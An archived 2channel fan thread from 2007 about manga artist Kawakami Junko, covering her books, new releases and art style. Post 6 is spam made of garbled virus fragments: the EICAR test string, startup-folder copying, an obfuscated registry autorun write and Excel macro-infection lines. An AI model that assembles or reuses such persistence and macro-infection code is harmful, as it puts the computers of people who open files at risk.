2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

かわかみじゅんこ 3

1 :1:2007/11/03(土) 23:21:37 ID:KclErlEG0
落ちたのでたてました。

FEEL YOUNG 、ease などで活躍中。
11月8日に「パリパリ伝説 3」、
発売日はまだ不明ですが書き下ろし単行本「It's your world」が発売予定です。

過去ログ・著作リスト・Q&Aは>>2

2 :花と名無しさん:2007/11/03(土) 23:22:39 ID:???0
かわかみじゅんこ
http://salad.2ch.net/gcomic/kako/974/974115892.html

かわかみじゅんこスレ
http://salad.2ch.net/gcomic/kako/996/996849175.html

☆★かわかみじゅんこ★☆
http://salad.2ch.net/gcomic/kako/1001/10015/1001596241.html

かわかみじゅんこ
http://comic6.2ch.net/test/read.cgi/gcomic/1032334516/

かわかみじゅんこ2
http://anime2.2ch.net/test/read.cgi/gcomic/1122763603/

3 :花と名無しさん:2007/11/03(土) 23:23:51 ID:???0
既刊単行本

○少女ケニヤ(宝島社)
○ワレワレハ(宝島社)
○ネオンテトラ(飛鳥新社)
○キキララ火山(飛鳥新社)
○銀河ガールパンダボーイ(祥伝社)
○パリパリ伝説(祥伝社)
○パリパリ伝説 2(祥伝社)
○あかずのふみきり(祥伝社)
○少女ケニヤ(祥伝社) ※新装版


○いたいけざかり(光彩書房)※PNは"西目丸"

4 :花と名無しさん:2007/11/03(土) 23:25:41 ID:???0
まめちしき/頻出Q&A

Q.
柴咲コウは、芸名をかわかみじゅんこの漫画の登場人物からとったってホント?
A.
本当。『GOLDEN DELICIOUS APPLE SHERBET(少女ケニヤ収録)』
の主人公「柴崎紅」に共感する部分があったため、少し字をいじり使用したとのこと。
しかしご本人はその名前の由来とした漫画がなんだったかすっかり失念していたらしい・・・。


Q.
かわかみ先生って何歳なんでしょう?
A.
1973年生まれの34歳。


Q.
西目丸って??
A.
かわかみ先生の昔のペンネーム。
96,7年頃から本名のかわかみじゅんこ(川上純子)を使用され始めたようです。
西目丸名義で同人誌も描かれていました。

5 :1:2007/11/03(土) 23:28:25 ID:???0
以上です。
前スレのテンプレをちょっと修正しましたが、
補足あればよろしくお願いします。

6 :花と名無しさん:2007/11/04(日) 00:26:45 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


7 :花と名無しさん:2007/11/04(日) 02:18:02 ID:???O
今日、図書館でアンティーク着物の雑誌を借りたら
かわかみさんの漫画が乗っててびっくりしました。


8 :花と名無しさん:2007/11/04(日) 19:11:27 ID:???0
>>1
いつの間にか落ちてたんだ。
スレたて乙

>>7
何て雑誌?

9 :花と名無しさん:2007/11/05(月) 21:48:49 ID:???0
1乙

10 :花と名無しさん:2007/11/06(火) 19:01:44 ID:???O
>>1さん乙です。

田舎住みの自分は今日パリパリ3巻取り置きしに書店に行ってたんだが
取り置きどころか「入荷する予定はありません」と言われたw
取り寄せしたけど一週間くらいかかるらしいorz

11 :花と名無しさん:2007/11/06(火) 20:50:56 ID:???0
今月発売のダヴィンチの付録にかわかみさんが描いてたよ

12 :花と名無しさん:2007/11/08(木) 22:00:32 ID:???0
パリパリ伝説3巻買った〜
本屋から直帰すればよかったのに
ヘタに街うろついて風邪ひいてしまい
今ベッドでダウンしつつ読んでる。おもしろいよー。
パリパリ読むと自分の子どももいつも以上にかわいく思える。

13 :花と名無しさん:2007/11/09(金) 01:10:15 ID:???0
3巻買った。なごむわーこの漫画。
IKEAにすごく行きたくなった。名古屋に店できないかなー。
子牛肉とかも食べたくなるね。バターたっぷしで。

14 :花と名無しさん:2007/11/09(金) 12:32:33 ID:???O
パリパリ3巻買ってきたー。表紙かわいい。

15 :花と名無しさん:2007/11/11(日) 01:32:54 ID:???O
来月号のフィールヤングに、
ストーリーものが載るね。
パリパリも休まないし。嬉しい。

書き下ろし本も早く詳細カモ〜ン。

16 :花と名無しさん:2007/11/11(日) 10:12:23 ID:???0
パリパリ3昨日届いた。
コーヒー煮詰まると、納豆の臭いはするね。
職場のコーヒーメーカーのあたり、時々うわっクサッて驚く。
お茶党なんで、味まで納豆なのかどうかはわからん。

17 :花と名無しさん:2007/11/11(日) 16:41:04 ID:???0
書き下ろし単行本と来月号フィーヤン掲載が来るのかー
最近マンガはパリパリかダヴィンチのだけだったし
かわかみさんはストーリーマンガから遠ざかってしまうのか…と思ってただけに
すごくうれしい。

18 :花と名無しさん:2007/11/11(日) 22:00:39 ID:???0
"It's your world"、単行本になるんだ。
楽しみだけど日本語で出るんだよね できれば仏語版も読みたい…

プリントアウトして辞書ひきつつ読もうと思ったけど、
FLASHプリントアウトってどうやんのよ〜
いちいちスクリーンショット&ペーストやってたら日が暮れる。

19 :花と名無しさん:2007/11/11(日) 22:17:36 ID:???0
頑張ってそれをやったらてんぽらりに入ってて憤死しそうになった

20 :花と名無しさん:2007/11/11(日) 23:20:49 ID:???0
フランス語版いいね、私もどっちも欲しい。

21 :花と名無しさん:2007/11/12(月) 18:57:14 ID:???0
パリパリ面白いんだけどパリライフより赤子ライフに変わってきたなあ。
三年も住んでれば目新しいこともなくなってくるからしょうがないのかな。

22 :花と名無しさん:2007/11/12(月) 21:31:49 ID:???0
みんな書き下ろし単行本の情報はどこで得たの?

23 :花と名無しさん:2007/11/12(月) 21:42:06 ID:???0
パリパリは面白いから大好きだけどストーリーものが
まったく面白くないのは私だけ?

24 :花と名無しさん:2007/11/12(月) 21:57:08 ID:???0
面白くない訳ではないけれど、かわかみさんの感覚を感じきれない自分にもどかしさを感じる…
むかーし、がゆんが出てきた時も似たような感じを持ったかも(作風全然違うけど)。
きっととても新しい感覚なんだろうなあって思うと寂しい。共感より理解して読んでる。

25 :花と名無しさん:2007/11/12(月) 22:16:30 ID:???0
>>16
カレー食べた後にコーヒー飲むと
口の中をもぁっと納豆の風味が醸し出すよ。
お試しあれ

26 :花と名無しさん:2007/11/13(火) 03:08:12 ID:???O
>>22 フィーヤンで、他社の仕事ネタの4コマが掲載された時に、雑誌の柱で担当さん(のぶえ嬢?)が日本で発売しますよ〜って告知してました。

27 :花と名無しさん:2007/11/13(火) 07:30:02 ID:???O
>>23
人それぞれだけど、このスレに来るのは
基本的にかわかみさんのファンだからストーリーものが好きな人多いと思う。
私はパリパリよりストーリーものの方を望んでるよ。心にグッとくる。
エッセイ漫画も別に嫌いじゃないけど…かわかみさんがパリパリみたいなのしか
描かなくなったら私は離れてしまうかも

28 :花と名無しさん:2007/11/13(火) 07:59:22 ID:???O
>>27
わかる。
しかも最初に読んでこれは凄い!と思ったのがコギャルとかのだったから、余計そう思うのかも。
誰もが年をとり感覚も変わっていくものだから仕方ないのかもね。
でもコミックは買うけどね!

29 :花と名無しさん:2007/11/13(火) 08:17:44 ID:???0
ストーリーものはクセがあるというかなんというか。
ハマればうおおたまら〜〜ん!となるんだけど。
かわかみ世界に凄く酔って読めちゃう。
私はストーリーものもいいけどやっぱりカラーが一番グッとくる。
パリパリは少しだけどカラーがあって嬉しいけどモノクロオンリーになってしまったら
魅力は減っちゃうな…
高くてもいいから画集がでてくれればなあっ。

30 :花と名無しさん:2007/11/13(火) 09:07:10 ID:???O
かわかみさん画集欲しい!出版されたら絶対買う

昔の漫画はコギャルが主人公のが多いけど、
かわかみさんの描く若い女の子の気持ちには普遍性があると思う。
本人は、女子高生萌えして描いたって言ってたっけ。
クラブハリケーンとかみどり姫みたいなのもいいし、かわかみさんが描く人物とか世界が大好きだー。
イッツユアワールドものすごく楽しみ。

31 :花と名無しさん:2007/11/13(火) 14:14:16 ID:???0
3巻のカバーイラストのかわかみさんの服はトトロですよね?

32 :花と名無しさん:2007/11/13(火) 17:05:10 ID:???0
>>19
やったのか!すごいなー
私は第一話だけで40P以上あるのに気付いて
早々に諦めちゃったよ…

かわかみさんの色の塗り方って独特でいいよね。
最初に見たのってたしかCUTiEとかの星占いページだったと思う
その時は漫画家って知らなかったけど。
ストーリーも4コマも、子育て話のしかたも卓越してると思うなあ

33 :花と名無しさん:2007/11/13(火) 22:10:43 ID:???0
多分…トトロじゃないとおもうよ


34 :花と名無しさん:2007/11/13(火) 23:25:42 ID:???0
トトロには見えない・・・せいぜいふくろうとかじゃないか?

35 :花と名無しさん:2007/11/14(水) 00:05:42 ID:???0
ストーリーしか読んでなかった頃は
この人自分の世界に酔ってるなぁという
ナルシストなイメージだったけど
パリパリ読んだら明るい人で好感度持てたなぁ
ストーリー好きだったのにエッセイ漫画読んで
嫌いになった作家はいっぱいいるけど
かわかみさんはその逆だったわ

36 :花と名無しさん:2007/11/14(水) 14:48:27 ID:???O
う〜ん、色々なパターンがあるんだね。
私は逆に漫画はどこか突き放した感じがある気がして(特に初期の頃)そこが好きなんだけど。
人それぞれ感じる物が違うのに好きなんだから面白いね。

37 :花と名無しさん:2007/11/15(木) 21:11:56 ID:???0
酔ってるというより、一歩離れた所から描いているような印象があった。
ストーリーの中に自分が入り込まないというか、客観的というか、降ってきたものをそのまま描いているというか。
漫画家さんによっては、描くもの全てコレもあれも自分の分身なんていう人も多いと思うけど、
漫画は漫画というか、感覚的にさらっと描いたらあんな感じみたいな。
エッセイの明るい感じもあの一歩引いた感じが出てきてるようで、あまりエッセイとストーリーの隔たりは感じないな。

38 :花と名無しさん:2007/11/16(金) 01:28:30 ID:???0
>>37
>酔ってるというより、一歩離れた所から描いているような印象があった。

登場キャラが刹那系というか、世紀末系多いよね
明日世界が滅びようがそんなの関係ねえ(ryというか

39 :花と名無しさん:2007/11/21(水) 23:53:03 ID:???O
パリパリは好きだけどストーリー派の自分にはパリパリの好評ぶりにはがゆいものを感じることがある・・・
書き下ろし単行本超楽しみ

40 :花と名無しさん:2007/11/22(木) 02:44:27 ID:???0
「It's your world」フランス語版直リンク

http://php.arte-tv.com/mangarte/m_kawakami/fr1.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr2.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr3.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr4.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr5.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr6.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr7.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr8.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr9.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr10.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr11.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr12.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr13.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr14.jpg

41 :花と名無しさん:2007/11/22(木) 02:46:19 ID:???0
続き

http://php.arte-tv.com/mangarte/m_kawakami/fr15.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr16.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr17.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr18.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr19.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr20.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr21.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr22.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr23.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr24.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr25.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr26.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr27.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr28.jpg

42 :花と名無しさん:2007/11/22(木) 02:52:29 ID:???0
続き

http://php.arte-tv.com/mangarte/m_kawakami/fr29.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr30.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr31.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr32.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr33.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr34.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr35.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr36.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr37.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr38.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr39.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr40.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr41.jpg
http://php.arte-tv.com/mangarte/m_kawakami/fr42.jpg

43 :花と名無しさん:2007/11/22(木) 08:21:58 ID:???0
おおおお!お疲れ様&THX!



…絵に魅力が全然なくなっちゃったな……

44 :花と名無しさん:2007/11/22(木) 10:43:11 ID:???0
パリパリとストーリーものと足して2で割ったような絵だな。
好きだけど。
単行本楽しみーーー。

45 :花と名無しさん:2007/11/22(木) 18:43:56 ID:???0
ギャー
>>40 超ごくろうさま et ありがとう!!
がんばって辞書ひいて読んでみよう。

46 :花と名無しさん:2007/11/22(木) 19:04:49 ID:???0
トーンあんま貼ってないね
向こうで売ってなさそうだしな。
でもこれはこれで好きかも

47 :花と名無しさん:2007/11/23(金) 19:21:50 ID:jIvthjhcO
向こうの国に合わせてわざと絵柄とか変えてるんじゃない?


48 :花と名無しさん:2007/11/23(金) 21:44:27 ID:???0
そういう感じでもないような…
絵柄事体は変わってないよね
ペンタッチが変わった

49 :花と名無しさん:2007/11/23(金) 23:35:52 ID:???0
ペン先も向こうには繊細なものがなさそうだから、ペンタッチも変わったんじゃない?


50 :花と名無しさん:2007/11/23(金) 23:36:17 ID:???0
ペン先も向こうには繊細なものがなさそうだから、ペンタッチも変わったんじゃない?


51 :花と名無しさん:2007/11/23(金) 23:38:52 ID:???0
ドローイングペンになってんのかな?
もったいないなー!
線がつまんなく感じちゃう

52 :花と名無しさん:2007/11/24(土) 02:50:25 ID:???0
WEB連載用だから細かい線を減らしてるんじゃないの

53 :花と名無しさん:2007/11/25(日) 13:44:16 ID:???O
あーそっか。なるほど

54 :花と名無しさん:2007/11/26(月) 21:59:47 ID:???0
みどり姫1月下旬発売だって!
mixiより。

55 :花と名無しさん:2007/11/26(月) 22:02:37 ID:???0
やったーーー!!!
雑誌で読んだきりだったから嬉しい!

56 :花と名無しさん:2007/11/28(水) 05:27:01 ID:???0
仏郊外暴動の再来か 移民街で焼き打ち広がる

 パリ郊外の移民街で起きたバイクとパトカーとの衝突事故で地元少年2人が死亡したのをきっかけに、
反発する若者らの暴動が26日夜にかけてパリ周辺に広がった。警察によると、26日だけで警察官82人が負傷。
車63台と住宅5棟が燃やされ、若者6人が拘束された。2年前に仏全土で起きた暴動と似た状況となっている。

 発端は、15歳と16歳の少年が乗ったモトクロス用バイクが25日夕、パリ北郊の交差点で
パトカーと衝突した事故。2人は死亡し、パトカーの警察官らは大破したパトカーを放置して逃げ出した。
これに怒った周辺の若者らが暴れ、周囲の商店街に火がつけられた。

 パリ北部の6都市の移民街では26日夕から深夜まで、投石や火炎瓶攻撃を繰り返す
若者グループが警官隊と衝突した。

 パリ郊外では05年10月、警官の追跡から逃れようとした少年2人が変電所で感電死した
事件をきっかけに、移民街の若者による暴動が起き、仏全土に拡大した。

2007年11月27日 朝日新聞
http://www.asahi.com/international/update/1127/TKY200711270316.html

57 :花と名無しさん:2007/12/02(日) 10:46:55 ID:???O
二人目懐妊なんですか?


単行本派で。概出ならすません。。

58 :花と名無しさん:2007/12/02(日) 14:51:31 ID:???0
なんでそう思ったの?

59 :花と名無しさん:2007/12/02(日) 18:28:53 ID:???O
>>58前スレにも出た勘違いじゃない?
パリパリ3巻収録分に妊娠中の回想シーンがあって
それを二人目妊娠したのかと勘違いして書き込んでる人がいた。

60 :花と名無しさん:2007/12/03(月) 08:57:34 ID:???O
>57 です。

回想シーンでしたか!
腹ににんしん中と書いてあったので、懐妊か!
と思いました。

ありがとうございました。

18 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)